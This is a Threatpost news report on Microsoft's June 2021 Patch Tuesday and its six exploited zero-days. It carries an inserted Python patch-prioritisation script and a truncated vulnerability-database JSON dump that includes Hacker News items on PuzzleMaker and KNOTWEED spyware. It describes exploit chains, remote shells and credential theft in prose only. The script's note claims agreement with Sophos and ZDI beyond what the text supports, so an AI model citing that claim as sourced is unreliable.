Microsoft jumped on 50 vulnerabilities in this month’s [Patch Tuesday update](<https://msrc.microsoft.com/update-guide>), issuing fixes for CVEs in Microsoft Windows, .NET Core and Visual Studio, Microsoft Office, Microsoft Edge (Chromium-based and EdgeHTML), SharePoint Server, Hyper-V, Visual Studio Code – Kubernetes Tools, Windows HTML Platform, and Windows Remote Desktop.
Five of the CVEs are rated Critical and 45 are rated Important in severity. Microsoft reported that six of the bugs are currently under active attack, while three are publicly known at the time of release.
The number might seem light – it represents six fewer patches than Microsoft [released in May](<https://threatpost.com/wormable-windows-bug-dos-rce/166057/>) – but the number of critical vulnerabilities ticked up to five month-over-month.
Those actively exploited vulnerabilities can enable an attacker to hijack a system. They have no workarounds, so some security experts are recommending that they be patched as the highest priority.
The six CVEs under active attack in the wild include four elevation of privilege vulnerabilities, one information disclosure vulnerability and one remote code execution (RCE) vulnerability.
## Critical Bugs of Note
[CVE-2021-31985](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31985>) is a critical RCE vulnerability in Microsoft’s Defender antimalware software that should grab attention. A similar, critical bug in Defender was [patched in January](<https://threatpost.com/critical-microsoft-defender-bug-exploited/162992/>). The most serious of the year’s first Patch Tuesday, that earlier Defender bug was an RCE vulnerability that came under active exploit.
Another critical flaw is [CVE-2021-31963](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31963>), a Microsoft SharePoint Server RCE vulnerability. Jay Goodman, director of product marketing at Automox, said in a [blog post](<https://blog.automox.com/automox-experts-weigh-in-june-patch-tuesday-2021>) that an attacker exploiting this vulnerability “could take control of a system where they would be free to install programs, view or change data, or create new accounts on the target system with full user rights.”
While Microsoft rates this vulnerability as less likely to be exploited, Goodman suggested that organizations don’t let it slide: “Patching critical vulnerabilities in the 72-hour window before attackers can weaponize is an important first step to maintaining a safe and secure infrastructure,” he observed.
![A year-to-date summary of 2021 Microsoft vulnerability releases as of June. Source: Sophos](https://media.threatpost.com/wp-content/uploads/sites/103/2021/06/08141612/Sophos-impact-chart-June-21-patch-Tuesday-e1623176186946.png)

A year-to-date summary of 2021 Microsoft vulnerability releases as of June. Source: Sophos
## Bugs Exploited in the Wild
Microsoft fixed a total of seven zero-day vulnerabilities. One was [CVE-2021-31968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31968>), a Windows Remote Desktop Services denial-of-service vulnerability that was publicly disclosed but hasn’t been seen in attacks. It carries a CVSS score of 7.5.
These are the six flaws that Microsoft said are under active attack, all of them also zero-days:
* [CVE-2021-31955](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955>) – Windows Kernel Information Disclosure Vulnerability. Rating: Important. CVSS 5.5
* [CVE-2021-31956](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956>) – Windows NTFS Elevation of Privilege Vulnerability. Rating: Important. CVSS 7.8
* [CVE-2021-33739](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33739>) – Microsoft DWM Core Library Elevation of Privilege Vulnerability. Rating: Important. CVSS 8.4
* [CVE-2021-33742](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>) – Windows MSHTML Platform Remote Code Execution Vulnerability. Rating: **Critical**. CVSS 7.5
* [CVE-2021-31199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199>) – Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability. Rating: Important. CVSS 5.2
* [CVE-2021-31201](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201>) – Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability. Rating: Important. CVSS 5.2
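To show how a list like the one above turns into a patch queue, here is an added example that is not part of the Threatpost article or of any vendor's tooling. It parses advisory bullet lines in the page's own markdown format and orders them by the rule the article implies: actively exploited bugs first (they have no workarounds), then Critical-rated ones, then higher CVSS, with public disclosure as a tiebreaker. The six bullet lines are copied from the list above; the entry for CVE-2021-31968 is constructed from the preceding paragraph, and its "Important" rating is an assumption, since the article gives only its CVSS score.

```python
"""Added example (not from the Threatpost article): parse the advisory bullet
list in the page's own markdown format and order it into a patch queue."""
import re
from dataclasses import dataclass
from typing import List

# Matches one bullet line of the form used on the page:
#   * [CVE-2021-31956](<https://...>) – Windows NTFS Elevation of Privilege Vulnerability. Rating: Important. CVSS 7.8
# The rating may be wrapped in markdown bold (e.g. "**Critical**").
BULLET_RE = re.compile(
    r"^\*\s*\[(?P<cve>CVE-\d{4}-\d{4,})\]\(<(?P<url>[^>]+)>\)\s*[–-]\s*"
    r"(?P<title>.+?)\.\s*Rating:\s*\**(?P<rating>\w+)\**\.\s*CVSS\s*(?P<cvss>\d+(?:\.\d+)?)"
)

# Constructed input: the six in-the-wild entries, copied from the list above.
EXPLOITED_LINES = """
* [CVE-2021-31955](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955>) – Windows Kernel Information Disclosure Vulnerability. Rating: Important. CVSS 5.5
* [CVE-2021-31956](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956>) – Windows NTFS Elevation of Privilege Vulnerability. Rating: Important. CVSS 7.8
* [CVE-2021-33739](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33739>) – Microsoft DWM Core Library Elevation of Privilege Vulnerability. Rating: Important. CVSS 8.4
* [CVE-2021-33742](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>) – Windows MSHTML Platform Remote Code Execution Vulnerability. Rating: **Critical**. CVSS 7.5
* [CVE-2021-31199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199>) – Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability. Rating: Important. CVSS 5.2
* [CVE-2021-31201](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201>) – Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability. Rating: Important. CVSS 5.2
"""

# Constructed entry for the publicly disclosed, not-yet-exploited RDP bug.
# The article gives its CVSS (7.5) but not its rating; "Important" is an assumption.
DISCLOSED_LINES = """
* [CVE-2021-31968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31968>) – Windows Remote Desktop Services Denial of Service Vulnerability. Rating: Important. CVSS 7.5
"""


@dataclass(frozen=True)
class Advisory:
    cve: str
    url: str
    title: str
    rating: str
    cvss: float
    exploited: bool   # "under active attack" per the vendor
    public: bool      # publicly disclosed before the fix shipped


def parse_bullets(text: str, exploited: bool, public: bool = False) -> List[Advisory]:
    """Parse every matching bullet line; lines that don't match are skipped."""
    found = []
    for line in text.splitlines():
        m = BULLET_RE.match(line.strip())
        if m:
            found.append(Advisory(m["cve"], m["url"], m["title"], m["rating"],
                                  float(m["cvss"]), exploited, public))
    return found


def priority_key(a: Advisory):
    """Higher tuple = patch sooner: exploited, then Critical, then CVSS, then public."""
    return (a.exploited, a.rating.lower() == "critical", a.cvss, a.public)


def patch_order(advisories: List[Advisory]) -> List[str]:
    """CVE ids in deployment order. sorted() is stable, so equal keys keep list order."""
    return [a.cve for a in sorted(advisories, key=priority_key, reverse=True)]


def june_2021_queue() -> List[str]:
    """The seven zero-days from the article, ordered for deployment.
    The public-disclosure status of the six exploited bugs is not stated in
    the article, so it is left False for them."""
    items = parse_bullets(EXPLOITED_LINES, exploited=True)
    items += parse_bullets(DISCLOSED_LINES, exploited=False, public=True)
    return patch_order(items)


if __name__ == "__main__":
    for position, cve in enumerate(june_2021_queue(), start=1):
        print(f"{position}. {cve}")
```

Running it puts the exploited Critical MSHTML bug (CVE-2021-33742) first and the publicly disclosed but unexploited RDP bug last, which matches the ordering Sophos and ZDI recommend in the text; swap in the key tuple from your own exposure data to reflect which components you actually run.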
## CVE-2021-33742
This RCE vulnerability lies in MSHTML, the component the Internet Explorer engine uses to read and display content from websites. The bug could allow an attacker to execute code on a target system if a user views specially crafted web content. The [Zero Day Initiative](<https://www.zerodayinitiative.com/blog/2021/6/8/the-june-2021-security-update-review>)’s (ZDI’s) Dustin Childs noted in his Patch Tuesday analysis that since the vulnerability is in the Trident (MSHTML) engine itself, many different applications are affected, not just Internet Explorer. “It’s not clear how widespread the active attacks are, but considering the vulnerability impacts all supported Windows versions, this should be at the top of your test and deploy list,” he recommended.
The vulnerability doesn’t require special privilege to exploit, though the attack complexity is high, if that’s any consolation. An attacker would need to do some extra legwork to pull it off, noted Satnam Narang, staff research engineer at Tenable, in an email to Threatpost on Tuesday.
Immersive Labs’ Kevin Breen, director of cyber threat research, noted that visiting a website in a vulnerable browser is “a simple way for attackers to deliver this exploit.” He told Threatpost via email on Tuesday that since the library is used by other services and applications, “emailing HTML files as part of a phishing campaign is also a viable method of delivery.”
[Sophos decreed](<https://news.sophos.com/en-us/2021/06/08/six-in-the-wild-exploits-patched-in-microsofts-june-security-fix-release/>) this one to be the top concern of this month’s crop, given that it’s already being actively exploited by malicious actors.
## CVE-2021-31955, CVE-2021-31956: Used in PuzzleMaker Targeted Malware
CVE-2021-31955 is an information disclosure vulnerability in the Windows Kernel, while CVE-2021-31956 is an elevation of privilege vulnerability in Windows NTFS. The ZDI’s Childs noted that CVE-2021-31956 was reported by the same researcher who found CVE-2021-31955, an information disclosure bug also listed as under active attack. They could be linked, he suggested: “It’s possible these bugs were used in conjunction, as that is a common technique – use a memory leak to get the address needed to escalate privileges. These bugs are important on their own and could be even worse when combined. Definitely prioritize the testing and deployment of these patches.”
He was spot-on. On Tuesday, Kaspersky announced that its researchers had discovered a highly targeted malware campaign launched in April against multiple companies, in which a previously unknown threat actor used a chain of Chrome and Windows zero-day exploits, the Windows half of which was these two bugs.
In a press release, Kaspersky said that one of the exploits was used for RCE in the Google Chrome web browser, while the other was an elevation of privilege exploit fine-tuned to target “the latest and most prominent builds” of Windows 10.
“Recent months have seen a wave of advanced threat activity exploiting zero-days in the wild,” according to the release. “In mid-April, Kaspersky experts discovered yet a new series of highly targeted exploit attacks against multiple companies that allowed the attackers to stealthily compromise the targeted networks.”
Kaspersky hasn’t yet found a connection between these attacks and any known threat actors, so it has dubbed the actor PuzzleMaker. It said that all the attacks were conducted through Chrome and used an exploit that allowed for RCE. Kaspersky researchers weren’t able to retrieve the code for the exploit, but the timeline and availability suggest the attackers were using the now-patched [CVE-2021-21224](<https://www.cvedetails.com/cve/CVE-2021-21224>) vulnerability in Chrome and Chromium browsers, which allows attackers to exploit the Chrome renderer process (the processes responsible for what happens inside users’ tabs).
Kaspersky experts did find and analyze the second exploit, however: an elevation-of-privilege exploit that abuses two distinct vulnerabilities in the Microsoft Windows OS kernel, CVE-2021-31955 and CVE-2021-31956. The CVE-2021-31955 bug “is affiliated with SuperFetch, a feature first introduced in Windows Vista that aims to reduce software loading times by pre-loading commonly used applications into memory,” they explained.
The second flaw, CVE-2021-31956, is an elevation-of-privilege vulnerability, a heap-based buffer overflow. Kaspersky said that attackers used this vulnerability alongside Windows Notification Facility (WNF) “to create arbitrary memory read/write primitives and execute malware modules with system privileges.”
“Once the attackers have used both the Chrome and Windows exploits to gain a foothold in the targeted system, the stager module downloads and executes a more complex malware dropper from a remote server,” they continued. “This dropper then installs two executables, which pretend to be legitimate files belonging to Microsoft Windows OS. The second of these two executables is a remote shell module, which is able to download and upload files, create processes, sleep for certain periods of time, and delete itself from the infected system.”
Boris Larin, senior security researcher with Kaspersky’s Global Research and Analysis Team (GReAT), said that the team hasn’t been able to link these highly targeted attacks to any known threat actor, hence the name PuzzleMaker and the determination to closely monitor the security landscape “for future activity or new insights about this group,” he was quoted as saying in the press release.
If the current trend is any indication, expect to see more of the same, Larin said. “Overall, of late, we’ve been seeing several waves of high-profile threat activity being driven by zero-day exploits,” he said. “It’s a reminder that zero days continue to be the most effective method for infecting targets. Now that these vulnerabilities have been made publicly known, it’s possible that we’ll see an increase of their usage in attacks by this and other threat actors. That means it’s very important for users to download the latest patch from Microsoft as soon as possible.”
## CVE-2021-31199/CVE-2021-31201
The two Enhanced Cryptographic Provider Elevation of Privilege vulnerabilities are linked to the Adobe Reader bug that [came under active attack](<https://threatpost.com/adobe-zero-day-bug-acrobat-reader/166044/>) last month (CVE-2021-28550), ZDI’s Childs explained. “It’s common to see privilege escalation paired with code execution bugs, and it seems these two vulnerabilities were the privilege escalation part of those exploits,” he said. “It is a bit unusual to see a delay between patch availability between the different parts of an active attack, but good to see these holes now getting closed.”
## CVE-2021-33739
Breen noted that privilege escalation vulnerabilities such as this one in the Microsoft DWM Core Library are just as valuable to attackers as RCEs. “Once they have gained an initial foothold, they can move laterally across the network and uncover further ways to escalate to system or domain-level access,” he said. “This can be hugely damaging in the event of ransomware attacks, where high privileges can enable the attackers to stop or destroy backups and other security tools.”
Published 2021-06-08 by Lisa Vaas, Threatpost: https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/
"THREATPOST:6F7C157D4D3EB409080D90F02185E728", "THREATPOST:A8242348917526090B7A1B23735D5C6C", "THREATPOST:EA23582BD77C428ACE9B9DB7D5741EB6", "THREATPOST:EED27183B3F49112A9E785EA56534781"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-21224"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-21224", "epss": "0.969350000", "percentile": "0.994990000", "modified": "2023-03-17"}, {"cve": "CVE-2021-28550", "epss": "0.713430000", "percentile": "0.974580000", "modified": "2023-03-17"}, {"cve": "CVE-2021-31199", "epss": "0.000490000", "percentile": "0.154190000", "modified": "2023-03-17"}, {"cve": "CVE-2021-31201", "epss": "0.000490000", "percentile": "0.154190000", "modified": "2023-03-17"}, {"cve": "CVE-2021-31955", "epss": "0.973570000", "percentile": "0.997920000", "modified": "2023-03-17"}, {"cve": "CVE-2021-31956", "epss": "0.001660000", "percentile": "0.516220000", "modified": "2023-03-17"}, {"cve": "CVE-2021-31963", "epss": "0.019960000", "percentile": "0.870330000", "modified": "2023-03-17"}, {"cve": "CVE-2021-31968", "epss": "0.001270000", "percentile": "0.457470000", "modified": "2023-03-17"}, {"cve": "CVE-2021-31985", "epss": "0.041500000", "percentile": "0.908430000", "modified": "2023-03-17"}, {"cve": "CVE-2021-33739", "epss": "0.000860000", "percentile": "0.345970000", "modified": "2023-03-17"}, {"cve": "CVE-2021-33742", "epss": "0.822710000", "percentile": "0.977990000", "modified": "2023-03-17"}], "vulnersScore": 0.7}, "_state": {"dependencies": 1678920471, "score": 1678921101, "epss": 1679073339}, "_internal": {"score_hash": "dba7757594fe9aa2f38d42e39dc98dd4"}}
{"thn": [{"lastseen": "2022-05-09T12:37:59", "description": "[](<https://thehackernews.com/images/-Oinzu8T6SmI/YMBZ7WkhbJI/AAAAAAAACzI/kVA4Ura4Yl4MrNb_jPNPBtgjkBj1DSs1wCLcBGAsYHQ/s0/microsoft-windows-update.jpg>)\n\nMicrosoft on Tuesday released another round of [security updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jun>) for Windows operating system and other supported software, squashing 50 vulnerabilities, including six zero-days that are said to be under active attack.\n\nThe flaws were identified and resolved in Microsoft Windows, .NET Core and Visual Studio, Microsoft Office, Microsoft Edge (Chromium-based and EdgeHTML), SharePoint Server, Hyper-V, Visual Studio Code - Kubernetes Tools, Windows HTML Platform, and Windows Remote Desktop.\n\nOf these 50 bugs, five are rated Critical, and 45 are rated Important in severity, with three of the issues publicly known at the time of release. The vulnerabilities that being actively exploited are listed below -\n\n * [**CVE-2021-33742**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>) (CVSS score: 7.5) - Windows MSHTML Platform Remote Code Execution Vulnerability\n * [**CVE-2021-33739**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33739>) (CVSS score: 8.4) - Microsoft DWM Core Library Elevation of Privilege Vulnerability\n * [**CVE-2021-31199**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199>) (CVSS score: 5.2) - Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability\n * [**CVE-2021-31201**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201>) (CVSS score: 5.2) - Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability\n * [**CVE-2021-31955**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955>) (CVSS score: 5.5) - Windows Kernel Information Disclosure Vulnerability\n * 
[**CVE-2021-31956**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956>) (CVSS score: 7.8) - Windows NTFS Elevation of Privilege Vulnerability\n\nMicrosoft didn't disclose the nature of the attacks, how widespread they are, or the identities of the threat actors exploiting them. But the fact that four of the six flaws are privilege escalation vulnerabilities suggests that attackers could be leveraging them as part of an infection chain to gain elevated permissions on the targeted systems to execute malicious code or leak sensitive information.\n\nThe Windows maker also noted that both CVE-2021-31201 and CVE-2021-31199 address flaws related to [CVE-2021-28550](<https://thehackernews.com/2021/05/alert-hackers-exploit-adobe-reader-0.html>), an arbitrary code execution vulnerability rectified by Adobe last month that it said was being \"exploited in the wild in limited attacks targeting Adobe Reader users on Windows.\"\n\nGoogle's Threat Analysis Group, which has been acknowledged as having reported CVE-2021-33742 to Microsoft, [said](<https://twitter.com/ShaneHuntley/status/1402320072123719690>) \"this seem[s] to be a commercial exploit company providing capability for limited nation state Eastern Europe / Middle East targeting.\"\n\nRussian cybersecurity firm Kaspersky, for its part, detailed that CVE-2021-31955 and CVE-2021-31956 were abused in a Chrome zero-day exploit chain ([CVE-2021-21224](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>)) in a series of highly targeted attacks against multiple companies on April 14 and 15. 
The intrusions were attributed to a new threat actor dubbed \"PuzzleMaker.\"\n\n\"While we were not able to retrieve the exploit used for remote code execution (RCE) in the Chrome web browser, we were able to find and analyze an elevation of privilege (EoP) exploit that was used to escape the sandbox and obtain system privileges,\" Kaspersky Lab researchers [said](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).\n\nElsewhere, Microsoft fixed numerous remote code execution vulnerabilities spanning Paint 3D, Microsoft SharePoint Server, Microsoft Outlook, Microsoft Office Graphics, Microsoft Intune Management Extension, Microsoft Excel, and Microsoft Defender, as well as several privilege escalation flaws in Microsoft Edge, Windows Filter Manager, Windows Kernel, Windows Kernel-Mode Driver, Windows NTLM Elevation, and Windows Print Spooler.\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update or by selecting Check for Windows updates.\n\n### Software Patches From Other Vendors\n\nAlongside Microsoft, a number of other vendors have also released a slew of patches on Tuesday, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security.html>)\n * [Android](<https://source.android.com/security/bulletin/2021-06-01>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [Intel](<https://blogs.intel.com/technology/2021/06/intel-security-advisories-for-june-2021/>)\n * Linux distributions [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-June/thread.html>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), and [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999>) (with cybersecurity firm Onapsis 
[credited](<https://onapsis.com/blog/sap-security-patch-day-june-2021-multiple-memory-corruption-vulnerabilities-can-lead-system>) with identifying 20 of the 40 remediated flaws)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp>), and\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-09T06:07:00", "type": "thn", "title": "Update Your Windows Computers to Patch 6 New In-the-Wild Zero-Day Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224", "CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-09T16:52:54", "id": "THN:1DDE95EA33D4D9F304973569FC787451", "href": 
"https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-29T03:59:29", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjRrnxKtJzXQbaLrPRY2GEIij8so07HImMs9wbPTTP-j92ED6wxTFv-NdQyw_Z0JBlqIYh-H3g2WKAcIkt70zKcB5AxP9KcQgCqChBwNsYPu9CQ_Xp6uBmkhxyoNZpHZIIQrV5TkreAFNBg-kFpOzjxBYxhl5bZqKZH6j9zgyd3itncGVyM5L09fy-c/s728-e100/windows-hacker.jpg>)\n\nA cyber mercenary that \"ostensibly sells general security and information analysis services to commercial customers\" used several Windows and Adobe zero-day exploits in limited and highly-targeted attacks against European and Central American entities.\n\nThe company, which Microsoft describes as a private-sector offensive actor (PSOA), is an Austria-based outfit called [DSIRF](<https://web.archive.org/web/20220713203741/https:/dsirf.eu/about/>) that's linked to the development and attempted sale of a piece of cyberweapon referred to as **Subzero**, which can be used to hack targets' phones, computers, and internet-connected devices.\n\n\"Observed victims to date include law firms, banks, and strategic consultancies in countries such as Austria, the United Kingdom, and Panama,\" the tech giant's cybersecurity teams [said](<https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/>) in a Wednesday report.\n\nMicrosoft is [tracking](<https://blogs.microsoft.com/on-the-issues/2022/07/27/private-sector-cyberweapons-psoas-knotweed/>) the actor under the moniker KNOTWEED, continuing its trend of terming PSOAs using names given to trees and shrubs. 
The company previously designated the name [SOURGUM](<https://thehackernews.com/2021/07/israeli-firm-helped-governments-target.html>) to Israeli spyware vendor Candiru.\n\nKNOTWEED is known to dabble in both access-as-a-service and [hack-for-hire](<https://thehackernews.com/2022/06/google-blocks-dozens-of-malicious.html>) operations, offering its toolset to third parties as well as directly associating itself in certain attacks.\n\nWhile the former entails the sales of end-to-end hacking tools that can be used by the purchaser in their own operations without the involvement of the offensive actor, hack-for-hire groups run the targeted operations on behalf of their clients.\n\nThe deployment of Subzero is said to have transpired through the exploitation of numerous issues, including an attack chain that abused an unknown Adobe Reader remote code execution (RCE) flaw and a zero-day privilege escalation bug ([CVE-2022-22047](<https://thehackernews.com/2022/07/microsoft-releases-fix-for-zero-day.html>)), the latter of which was addressed by Microsoft as part of its July Patch Tuesday updates.\n\n\"The exploits were packaged into a PDF document that was sent to the victim via email,\" Microsoft explained. \"CVE-2022-22047 was used in KNOTWEED related attacks for privilege escalation. The vulnerability also provided the ability to escape sandboxes and achieve system-level code execution.\"\n\nSimilar attack chains observed in 2021 leveraged a combination of two Windows privilege escalation exploits (CVE-2021-31199 and CVE-2021-31201) in conjunction with an Adobe reader flaw (CVE-2021-28550). 
The three vulnerabilities were [resolved](<https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html>) in June 2021.\n\nThe deployment of Subzero subsequently occurred through a fourth exploit, this time taking advantage of a privilege escalation vulnerability in the Windows Update Medic Service ([CVE-2021-36948](<https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html>)), which was closed by Microsoft in August 2021.\n\nBeyond these exploit chains, Excel files masquerading as real estate documents have been used as a conduit to deliver the malware, with the files containing [Excel 4.0 macros](<https://thehackernews.com/2022/01/emotet-now-using-unconventional-ip.html>) designed to kick-start the infection process.\n\nRegardless of the method employed, the intrusions culminate in the execution of shellcode, which is used to retrieve a second-stage payload called Corelump from a remote server in the form of a JPEG image that also embeds a loader named Jumplump that, in turn, loads Corelump into memory.\n\nThe evasive implant comes with a wide range of capabilities, including keylogging, capturing screenshots, exfiltrating files, running a remote shell, and running arbitrary plugins downloaded from the remote server.\n\nAlso deployed during the attacks were bespoke utilities like Mex, a command-line tool to run open source security software like Chisel, and PassLib, a tool to dump credentials from web browsers, email clients, and the Windows credential manager.\n\nMicrosoft said it uncovered KNOTWEED actively serving malware since February 2020 through infrastructure hosted on DigitalOcean and Choopa, alongside identifying subdomains that are used for malware development, debugging Mex, and staging the Subzero payload.\n\nMultiple links have also been unearthed between DSIRF and the malicious tools used in KNOTWEED's attacks.\n\n\"These include command-and-control infrastructure used by the malware directly linking to DSIRF, a 
DSIRF-associated GitHub account being used in one attack, a code signing certificate issued to DSIRF being used to sign an exploit, and other open-source news reports attributing Subzero to DSIRF,\" Redmond noted.\n\nSubzero is no different from off-the-shelf malware such as [Pegasus](<https://thehackernews.com/2022/07/pegasus-spyware-used-to-hack-devices-of.html>), [Predator](<https://thehackernews.com/2022/05/cytroxs-predator-spyware-target-android.html>), [Hermit](<https://thehackernews.com/2022/06/google-says-isps-helped-attackers.html>), and [DevilsTongue](<https://thehackernews.com/2022/07/candiru-spyware-caught-exploiting.html>), which are capable of infiltrating phones and Windows machines to remotely control the devices and siphon off data, sometimes without requiring the user to click on a malicious link.\n\nIf anything, the latest findings highlight a burgeoning international market for such sophisticated surveillance technologies to carry out targeted attacks aimed at members of civil society.\n\nAlthough companies that sell commercial spyware advertise their wares as a means to tackle serious crimes, evidence gathered so far has found [several instances](<https://thehackernews.com/2022/06/nso-confirms-pegasus-spyware-used-by-at.html>) of these tools being misused by authoritarian governments and private organizations to snoop on human rights advocates, journalists, dissidents, and politicians.\n\nGoogle's Threat Analysis Group (TAG), which is tracking over 30 vendors that hawk exploits or surveillance capabilities to state-sponsored actors, said the booming ecosystem underscores \"the extent to which commercial surveillance vendors have proliferated capabilities historically only used by governments.\"\n\n\"These vendors operate with deep technical expertise to develop and operationalize exploits,\" TAG's Shane Huntley [said](<https://blog.google/threat-analysis-group/googles-efforts-to-identify-and-counter-spyware/>) in a testimony to the U.S. 
House Intelligence Committee on Wednesday, adding, \"its use is growing, fueled by demand from governments.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-28T11:18:00", "type": "thn", "title": "Microsoft Uncovers Austrian Company Exploiting Windows and Adobe Zero-Day Exploits", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-36948", "CVE-2022-22047"], "modified": "2022-07-29T02:58:07", "id": "THN:DFA2CC41C78DFA4BED87B1410C21CE2A", "href": "https://thehackernews.com/2022/07/microsoft-uncover-austrian-company.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:58", "description": 
